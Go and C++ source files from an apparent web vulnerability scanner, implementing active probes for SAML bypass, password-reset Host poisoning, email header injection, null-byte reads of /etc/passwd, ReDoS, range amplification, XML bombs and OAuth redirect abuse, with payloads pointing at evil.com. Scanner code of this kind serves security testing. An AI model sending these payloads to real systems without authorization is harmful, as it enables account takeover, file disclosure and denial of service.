File: pkg/scanner/extra.go
package scanner

import (
	"fmt"
	"strings"
	"sync"
	"time"

	"github.com/zanicool/apex-cli/pkg/crawler"
	"github.com/zanicool/apex-cli/pkg/engine"
	"github.com/zanicool/apex-cli/pkg/oob"
)

func scanSAML(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	samlPaths := []string{"/saml/acs", "/saml/login", "/auth/saml", "/sso/saml", "/api/saml/callback"}
	if len(crawl.Pages) == 0 {
		return findings
	}
	baseURL := strings.Split(crawl.Pages[0].URL, "/")[0] + "//" + strings.Split(crawl.Pages[0].URL, "/")[2]
	// SAML signature wrapping / comment injection
	samlPayloads := []string{
		`<samlp:Response><saml:Assertion><saml:Subject><saml:NameID>admin@evil.com</saml:NameID></saml:Subject></saml:Assertion></samlp:Response>`,
		`<samlp:Response><!--injected--><saml:Assertion><saml:Subject><saml:NameID>admin</saml:NameID></saml:Subject></saml:Assertion></samlp:Response>`,
	}
	for _, path := range samlPaths {
		url := baseURL + path
		for _, pl := range samlPayloads {
			resp := http.Post(url, "application/xml", pl)
			if resp.Err == nil && resp.StatusCode == 200 && (strings.Contains(resp.Body, "admin") || strings.Contains(resp.Body, "token") || strings.Contains(resp.Body, "session")) {
				findings = append(findings, Finding{Type: "SAML Injection — Signature Bypass", Severity: "critical", URL: url, Detail: "SAML response accepted without proper signature validation", Template: "apex-saml"})
				break
			}
		}
	}
	return findings
}

func scanWebCacheDeception(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// Append static extension to dynamic pages
	extensions := []string{".css", ".js", ".png", ".jpg", ".ico", ".svg"}
	for _, page := range crawl.Pages[:min(10, len(crawl.Pages))] {
		baseResp := http.Get(page.URL)
		if baseResp.Err != nil || baseResp.StatusCode != 200 {
			continue
		}
		for _, ext := range extensions {
			testURL := strings.TrimRight(page.URL, "/") + "/nonexist" + ext
			resp := http.Get(testURL)
			if resp.Err == nil && resp.StatusCode == 200 && resp.Body == baseResp.Body {
				// Check if it's cached
				cacheHeaders := resp.Headers.Get("X-Cache") + resp.Headers.Get("CF-Cache-Status") + resp.Headers.Get("Age")
				if strings.Contains(strings.ToLower(cacheHeaders), "hit") || resp.Headers.Get("Age") != "" {
					findings = append(findings, Finding{Type: "Web Cache Deception", Severity: "high", URL: testURL, Detail: fmt.Sprintf("Dynamic content served and cached with %s extension", ext), Template: "apex-cache-deception"})
					break
				}
			}
		}
	}
	return findings
}

func scanTimingAttacks(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// User enumeration via timing
	loginPaths := []string{"/login", "/api/login", "/auth/login", "/api/auth/signin"}
	if len(crawl.Pages) == 0 {
		return findings
	}
	baseURL := strings.Split(crawl.Pages[0].URL, "/")[0] + "//" + strings.Split(crawl.Pages[0].URL, "/")[2]
	for _, path := range loginPaths {
		url := baseURL + path
		// Time with valid-looking vs invalid username
		var validTimes, invalidTimes []time.Duration
		for i := 0; i < 3; i++ {
			r1 := http.Post(url, "application/json", `{"username":"admin","password":"wrong123"}`)
			if r1.Err == nil && r1.StatusCode != 404 {
				validTimes = append(validTimes, r1.Duration)
			}
			r2 := http.Post(url, "application/json", `{"username":"xyznonexist99","password":"wrong123"}`)
			if r2.Err == nil && r2.StatusCode != 404 {
				invalidTimes = append(invalidTimes, r2.Duration)
			}
		}
		if len(validTimes) >= 3 && len(invalidTimes) >= 3 {
			avgValid := (validTimes[0] + validTimes[1] + validTimes[2]) / 3
			avgInvalid := (invalidTimes[0] + invalidTimes[1] + invalidTimes[2]) / 3
			diff := avgValid - avgInvalid
			if diff < 0 {
				diff = -diff
			}
			if diff > 100*time.Millisecond {
				findings = append(findings, Finding{Type: "Timing-Based User Enumeration", Severity: "medium", URL: url, Detail: fmt.Sprintf("Response time difference: %v (valid user) vs %v (invalid user)", avgValid, avgInvalid), Template: "apex-timing-enum"})
			}
		}
	}
	return findings
}

func scanAccountTakeover(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	if len(crawl.Pages) == 0 {
		return findings
	}
	baseURL := strings.Split(crawl.Pages[0].URL, "/")[0] + "//" + strings.Split(crawl.Pages[0].URL, "/")[2]
	// Password reset token predictability
	resetPaths := []string{"/forgot-password", "/api/auth/forgot", "/api/password/reset", "/reset-password"}
	for _, path := range resetPaths {
		url := baseURL + path
		resp := http.Post(url, "application/json", `{"email":"test@test.com"}`)
		if resp.Err != nil || resp.StatusCode == 404 {
			continue
		}
		// Test host header poisoning on reset
		items := []engine.RequestItem{{URL: url, Method: "POST", Headers: map[string]string{"Host": "evil.com", "Content-Type": "application/json"}}}
		for r := range http.BatchRequest(items, 1) {
			if r.Err == nil && r.StatusCode == 200 && strings.Contains(r.Body, "evil.com") {
				findings = append(findings, Finding{Type: "Account Takeover — Password Reset Poisoning", Severity: "critical", URL: url, Detail: "Reset link uses attacker Host header", Template: "apex-ato-reset"})
			}
		}
		// Test response manipulation (change email in response)
		resp2 := http.Post(url, "application/json", `{"email":"victim@target.com","new_email":"attacker@evil.com"}`)
		if resp2.Err == nil && resp2.StatusCode == 200 {
			findings = append(findings, Finding{Type: "Account Takeover — Email Change Without Verification", Severity: "high", URL: url, Detail: "Email change accepted without current password/2FA", Template: "apex-ato-email"})
		}
	}
	return findings
}

func scanEmailInjection(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	emailPayloads := []string{
		"test@test.com%0aCc:attacker@evil.com",
		"test@test.com\r\nBcc:attacker@evil.com",
		"test@test.com%0d%0aTo:attacker@evil.com",
	}
	for _, form := range crawl.Forms {
		for _, inp := range form.Inputs {
			if !strings.Contains(strings.ToLower(inp.Name), "email") && !strings.Contains(strings.ToLower(inp.Name), "to") && !strings.Contains(strings.ToLower(inp.Name), "from") {
				continue
			}
			for _, pl := range emailPayloads {
				data := inp.Name + "=" + pl
				resp := http.Post(form.Action, "application/x-www-form-urlencoded", data)
				if resp.Err == nil && resp.StatusCode == 200 && !strings.Contains(strings.ToLower(resp.Body), "invalid") {
					findings = append(findings, Finding{Type: "Email Header Injection", Severity: "high", URL: form.Action, Param: inp.Name, Payload: pl, Detail: "Email header injection — can send emails to arbitrary recipients", Template: "apex-email-inject"})
					break
				}
			}
		}
	}
	return findings
}

func scanReDoS(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// Payloads that trigger catastrophic backtracking
	redosPayloads := []string{
		strings.Repeat("a", 50) + "!",
		strings.Repeat("a", 30) + "@" + strings.Repeat("a", 30) + ".com!",
		"<" + strings.Repeat("a", 50) + ">",
	}
	for u, params := range crawl.Params {
		for _, p := range params {
			for _, pl := range redosPayloads {
				testURL := injectParam(u, p, pl)
				resp := http.Get(testURL)
				if resp.Err == nil && resp.Duration > 3*time.Second {
					findings = append(findings, Finding{Type: "ReDoS — Regular Expression Denial of Service", Severity: "medium", URL: testURL, Param: p, Detail: fmt.Sprintf("Response took %.1fs with regex-evil payload", resp.Duration.Seconds()), Template: "apex-redos"})
					break
				}
			}
		}
	}
	return findings
}

func scanNullByte(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	for u, params := range crawl.Params {
		for _, p := range params {
			testURL := injectParam(u, p, "../../../etc/passwd%00.jpg")
			resp := http.Get(testURL)
			if resp.Err == nil && strings.Contains(resp.Body, "root:") {
				findings = append(findings, Finding{Type: "Null Byte Injection — File Access", Severity: "critical", URL: testURL, Param: p, Template: "apex-null-byte"})
			}
		}
	}
	return findings
}

func scanRangeAmplification(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// HTTP Range header DoS
	for _, page := range crawl.Pages[:min(5, len(crawl.Pages))] {
		items := []engine.RequestItem{{URL: page.URL, Method: "GET", Headers: map[string]string{"Range": "bytes=0-,1-,2-,3-,4-,5-,6-,7-,8-,9-,10-,11-,12-,13-,14-"}}}
		for resp := range http.BatchRequest(items, 1) {
			if resp.Err == nil && resp.StatusCode == 206 && resp.Size > 1000 {
				findings = append(findings, Finding{Type: "HTTP Range Amplification DoS", Severity: "medium", URL: page.URL, Detail: fmt.Sprintf("Server processes overlapping ranges — %d bytes response for multi-range request", resp.Size), Template: "apex-range-dos"})
			}
		}
	}
	return findings
}

func scanHopByHop(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	// Hop-by-hop header abuse to strip security headers
	for _, page := range crawl.Pages[:min(5, len(crawl.Pages))] {
		items := []engine.RequestItem{{URL: page.URL, Method: "GET", Headers: map[string]string{"Connection": "close, X-Forwarded-For, X-Real-IP"}}}
		for resp := range http.BatchRequest(items, 1) {
			if resp.Err == nil && resp.StatusCode == 200 {
				// Compare with normal request
				normal := http.Get(page.URL)
				if normal.Err == nil && normal.Body != resp.Body {
					findings = append(findings, Finding{Type: "Hop-by-Hop Header Abuse", Severity: "medium", URL: page.URL, Detail: "Connection header strips proxy headers — potential access control bypass", Template: "apex-hop-by-hop"})
				}
			}
		}
	}
	return findings
}

func scanMethodOverride(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	overrideHeaders := []string{"X-HTTP-Method-Override", "X-Method-Override", "X-HTTP-Method"}
	for _, page := range crawl.Pages[:min(10, len(crawl.Pages))] {
		for _, header := range overrideHeaders {
			items := []engine.RequestItem{{URL: page.URL, Method: "POST", Headers: map[string]string{header: "DELETE", "Content-Type": "application/json"}}}
			for resp := range http.BatchRequest(items, 1) {
				if resp.Err == nil && resp.StatusCode == 200 && resp.Body != "" {
					normalPost := http.Post(page.URL, "application/json", "{}")
					if normalPost.Err == nil && normalPost.Body != resp.Body {
						findings = append(findings, Finding{Type: "HTTP Method Override Accepted", Severity: "medium", URL: page.URL, Detail: fmt.Sprintf("%s: DELETE changes response — can bypass method restrictions", header), Template: "apex-method-override"})
						break
					}
				}
			}
		}
	}
	return findings
}

func scanXSLT(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	xsltPayload := `<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><xsl:value-of select="system-property('xsl:vendor')"/></xsl:template></xsl:stylesheet>`
	for _, form := range crawl.Forms[:min(10, len(crawl.Forms))] {
		resp := http.Post(form.Action, "application/xml", xsltPayload)
		if resp.Err == nil && (strings.Contains(resp.Body, "libxslt") || strings.Contains(resp.Body, "Xalan") || strings.Contains(resp.Body, "Saxon") || strings.Contains(resp.Body, "Microsoft")) {
			findings = append(findings, Finding{Type: "XSLT Injection", Severity: "critical", URL: form.Action, Detail: "XSLT processor detected — file read and RCE possible", Template: "apex-xslt"})
		}
	}
	return findings
}

func scanLogInjection(cfg *engine.Config, http *engine.HTTPClient, crawl *crawler.Result, _ *oob.Client) []Finding {
	var findings []Finding
	logPayloads := []string{
		"admin%0a[CRITICAL] Unauthorized access from 127.0.0.1",
		"test\r\n[INFO] User admin logged in successfully",
	}
	for u, params := range crawl.Params {
		for _, p := range params {
			for _, pl := range logPayloads {
				testURL := injectParam(u, p, pl)
				http.Get(testURL) // Fire and forget — log injection is blind
			}
		}
	}
	// Log injection is typically blind, report as informational if params exist
	if len(crawl.Params) > 0 {
		findings = append(findings, Finding{Type: "Log Injection Attempted", Severity: "info", URL: "multiple", Detail: "CRLF payloads sent to all parameters — check server logs for injection", Template: "apex-log-inject"})
	}
	return findings
}

var _ = sync.Mutex{} // ensure sync imported

File: src/scanners/extra.cpp
/// @file scanners/extra.cpp
/// @brief Extra scanners: SAML, web cache deception, timing attacks, account
///        takeover, email injection, ReDoS, null byte, range amplification,
///        hop-by-hop, method override, XSLT, log injection.
#include <chrono>

#include "scanner_base.hpp"

namespace apex {
namespace {

/// Web cache deception — trick cache into storing private data.
std::vector<Finding> scan_web_cache_deception(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;
  std::string base = base_url_from(crawl.urls[0]);

  const std::vector<std::string> paths = {"/account", "/profile", "/settings"};
  const std::vector<std::string> extensions = {"/x.css", "/x.js", "/x.png"};

  for (const auto& path : paths) {
    for (const auto& ext : extensions) {
      auto resp = http.get(base + path + ext);
      if (resp.status_code == 200 && resp.body.size() > 100) {
        auto cache = resp.headers.find("X-Cache");
        if (cache != resp.headers.end() && cache->second.find("HIT") != std::string::npos) {
          findings.push_back({"Web Cache Deception", "high", base + path + ext, "Private page cached with static extension", "", ext, ""});
        }
      }
    }
  }
  return findings;
}

/// Timing attacks — detect information leakage via response time.
std::vector<Finding> scan_timing(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  for (const auto& url : crawl.urls) {
    auto targets = get_targets(crawl, url, "username");
    for (const auto& [base, param] : targets) {
      // Compare timing for existing vs non-existing values.
      long total_short = 0, total_long = 0;
      for (int i = 0; i < 3; ++i) {
        auto r1 = http.get(base + "admin");
        auto r2 = http.get(base + "nonexistent_user_xyz_" + std::to_string(i));
        total_short += r1.duration.count();
        total_long += r2.duration.count();
      }
      long diff = std::abs(total_short / 3 - total_long / 3);
      if (diff > 50) {
        findings.push_back({"Timing Attack", "low", url, "Response time difference: " + std::to_string(diff) + "ms avg", param, "", ""});
      }
    }
  }
  return findings;
}

/// Email header injection.
std::vector<Finding> scan_email_injection(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  const std::string payload = "test@test.com%0aBcc:evil@evil.com";

  for (const auto& url : crawl.urls) {
    for (const auto& p : crawl.params) {
      if (p.url != url) continue;
      if (p.name.find("email") == std::string::npos && p.name.find("mail") == std::string::npos) continue;
      auto resp = http.get(p.url + "?" + p.name + "=" + payload);
      if (resp.status_code == 200 && resp.body.find("error") == std::string::npos) {
        findings.push_back({"Email Injection", "medium", url, "Email header injection possible", p.name, payload, ""});
      }
    }
  }
  return findings;
}

/// ReDoS — Regular Expression Denial of Service.
std::vector<Finding> scan_redos(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  // Payloads that trigger catastrophic backtracking.
  const std::vector<std::string> payloads = {std::string(50, 'a') + "!", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!", std::string(30, '0') + "x"};

  for (const auto& url : crawl.urls) {
    auto targets = get_targets(crawl, url, "q");
    for (const auto& [base, param] : targets) {
      auto baseline = http.get(base + "normal");
      for (const auto& payload : payloads) {
        auto resp = http.get(base + payload);
        if (resp.duration.count() > baseline.duration.count() + 3000) {
          findings.push_back({"ReDoS", "medium", url, "Regex DoS: " + std::to_string(resp.duration.count()) + "ms", param, payload, ""});
          break;
        }
      }
    }
  }
  return findings;
}

/// Null byte injection.
std::vector<Finding> scan_null_byte(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  for (const auto& url : crawl.urls) {
    auto targets = get_targets(crawl, url, "file");
    for (const auto& [base, param] : targets) {
      auto resp = http.get(base + "../../etc/passwd%00.jpg");
      if (resp.body.find("root:") != std::string::npos) {
        findings.push_back({"Null Byte", "high", url, "Null byte truncation bypass", param, "../../etc/passwd%00.jpg", ""});
      }
    }
  }
  return findings;
}

/// Range header amplification.
std::vector<Finding> scan_range_amplification(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;

  // Send overlapping range request.
  std::string ranges = "bytes=0-0";
  for (int i = 1; i < 100; ++i) ranges += ",0-0";

  auto resp = http.get(crawl.urls[0], {{"Range", ranges}});
  if (resp.status_code == 206 && resp.body.size() > 1000) {
    findings.push_back(
        {"Range Amplification", "medium", crawl.urls[0], "Server processes overlapping ranges (DoS risk)", "", ranges.substr(0, 50), ""});
  }
  return findings;
}

/// Hop-by-hop header abuse.
std::vector<Finding> scan_hop_by_hop(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;

  auto normal = http.get(crawl.urls[0]);
  auto resp = http.get(crawl.urls[0], {{"Connection", "close, X-Forwarded-For"}});
  if (resp.status_code != normal.status_code || resp.body.size() != normal.body.size()) {
    findings.push_back({"Hop-by-Hop", "low", crawl.urls[0], "Hop-by-hop header stripping detected", "", "", ""});
  }
  return findings;
}

/// Method override — X-HTTP-Method-Override.
std::vector<Finding> scan_method_override(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;
  std::string base = base_url_from(crawl.urls[0]);

  const std::vector<std::string> paths = {"/api/user/1", "/api/admin"};
  for (const auto& path : paths) {
    auto resp = http.post(base + path, "", "text/plain", {{"X-HTTP-Method-Override", "DELETE"}});
    if (resp.status_code == 200 || resp.status_code == 204) {
      findings.push_back(
          {"Method Override", "medium", base + path, "X-HTTP-Method-Override accepted (DELETE)", "", "X-HTTP-Method-Override: DELETE", ""});
    }
  }
  return findings;
}

/// XSLT injection.
std::vector<Finding> scan_xslt(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  const std::string payload =
      R"xml(<?xml version="1.0"?><xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><xsl:value-of select="system-property('xsl:version')"/></xsl:template></xsl:stylesheet>)xml";

  for (const auto& url : crawl.urls) {
    auto resp = http.post(url, payload, "application/xml");
    if (resp.body.find("1.0") != std::string::npos || resp.body.find("2.0") != std::string::npos) {
      findings.push_back({"XSLT Injection", "high", url, "XSLT processing detected", "", "", ""});
    }
  }
  return findings;
}

/// Log injection.
std::vector<Finding> scan_log_injection(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  const std::string payload = "test%0d%0aINJECTED_LOG_ENTRY";

  for (const auto& url : crawl.urls) {
    auto targets = get_targets(crawl, url, "username");
    for (const auto& [base, param] : targets) {
      auto resp = http.get(base + payload);
      // Only report if the injected content is actually reflected in response
      if (resp.status_code == 200 && resp.body.find("INJECTED_LOG_ENTRY") != std::string::npos) {
        findings.push_back({"Log Injection", "low", url, "CRLF in parameter reflected in response (log/header injection)", param, payload, ""});
        break;
      }
    }
  }
  return findings;
}

/// SAML vulnerability scanner.
std::vector<Finding> scan_saml(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;
  std::string base = base_url_from(crawl.urls[0]);

  const std::vector<std::string> saml_paths = {"/saml/metadata", "/auth/saml/metadata", "/sso/saml/metadata"};

  for (const auto& path : saml_paths) {
    auto resp = http.get(base + path);
    if (resp.status_code == 200 && resp.body.find("EntityDescriptor") != std::string::npos) {
      findings.push_back({"SAML Metadata", "info", base + path, "SAML metadata exposed", "", "", ""});
      // Check for signature wrapping vulnerability.
      if (resp.body.find("WantAssertionsSigned") != std::string::npos && resp.body.find("false") != std::string::npos) {
        findings.push_back({"SAML Weakness", "high", base + path, "SAML assertions not required to be signed", "", "", ""});
      }
    }
  }
  return findings;
}

/// Billion Laughs — XML bomb DoS.
std::vector<Finding> scan_billion_laughs(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  // Small XML bomb that shouldn't crash but tests if XML parsing is unlimited.
  const std::string payload =
      "<?xml version=\"1.0\"?><!DOCTYPE lolz ["
      "<!ENTITY lol \"lol\">"
      "<!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;\">"
      "<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;\">"
      "]><root>&lol3;</root>";
  for (const auto& url : crawl.urls) {
    auto resp = http.post(url, payload, "application/xml");
    if (resp.duration.count() > 5000) {
      findings.push_back(
          {"Billion Laughs", "medium", url, "XML bomb caused " + std::to_string(resp.duration.count()) + "ms delay", "", "", ""});
    }
  }
  return findings;
}

/// Open Redirect → OAuth chain — steal tokens via redirect.
std::vector<Finding> scan_redirect_oauth_chain(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;
  std::string base = base_url_from(crawl.urls[0]);
  const std::vector<std::string> oauth_paths = {"/oauth/authorize", "/auth/authorize", "/connect/authorize"};
  for (const auto& path : oauth_paths) {
    auto resp = http.get(base + path + "?redirect_uri=https://evil.com/callback&response_type=code&client_id=test");
    if (resp.status_code == 302 || resp.status_code == 301) {
      auto loc = resp.headers.find("Location");
      if (loc != resp.headers.end() && loc->second.find("evil.com") != std::string::npos) {
        findings.push_back({"OAuth Redirect Chain", "high", base + path, "OAuth allows arbitrary redirect_uri", "",
                            "redirect_uri=https://evil.com/callback", ""});
      }
    }
  }
  return findings;
}

/// Tech-Specific — targeted checks based on detected technology.
std::vector<Finding> scan_tech_specific(const Config&, HttpClient& http, const CrawlResult& crawl) {
  std::vector<Finding> findings;
  if (crawl.urls.empty()) return findings;
  std::string base = base_url_from(crawl.urls[0]);
  auto resp = http.get(base + "/");

  // ColdFusion specific.
  if (resp.body.find("cfid") != std::string::npos || resp.body.find(".cfm") != std::string::npos) {
    auto cf = http.get(base + "/CFIDE/administrator/enter.cfm");
    if (cf.status_code == 200)
      findings.push_back(
          {"Tech-Specific", "high", base + "/CFIDE/administrator/enter.cfm", "ColdFusion admin panel accessible", "", "", ""});
  }
  // Laravel specific.
  if (resp.body.find("laravel") != std::string::npos) {
    auto dbg = http.get(base + "/_ignition/health-check");
    if (dbg.status_code == 200)
      findings.push_back({"Tech-Specific", "medium", base + "/_ignition/health-check", "Laravel Ignition debug mode enabled", "", "", ""});
  }
  // Django specific.
  if (resp.body.find("csrfmiddlewaretoken") != std::string::npos) {
    auto dbg = http.get(base + "/__debug__/");
    if (dbg.status_code == 200)
      findings.push_back({"Tech-Specific", "high", base + "/__debug__/", "Django debug toolbar accessible", "", "", ""});
  }
  return findings;
}

}  // namespace

std::vector<Scanner> register_extra_scanners() {
  return {
      {"Web Cache Deception", scan_web_cache_deception},
      {"Timing Attack", scan_timing},
      {"Email Injection", scan_email_injection},
      {"ReDoS", scan_redos},
      {"Null Byte", scan_null_byte},
      {"Range Amplification", scan_range_amplification},
      {"Hop-by-Hop", scan_hop_by_hop},
      {"Method Override", scan_method_override},
      {"XSLT Injection", scan_xslt},
      {"Log Injection", scan_log_injection},
      {"SAML", scan_saml},
      {"Billion Laughs", scan_billion_laughs},
      {"OAuth Redirect Chain", scan_redirect_oauth_chain},
      {"Tech-Specific", scan_tech_specific},
  };
}

}  // namespace apex
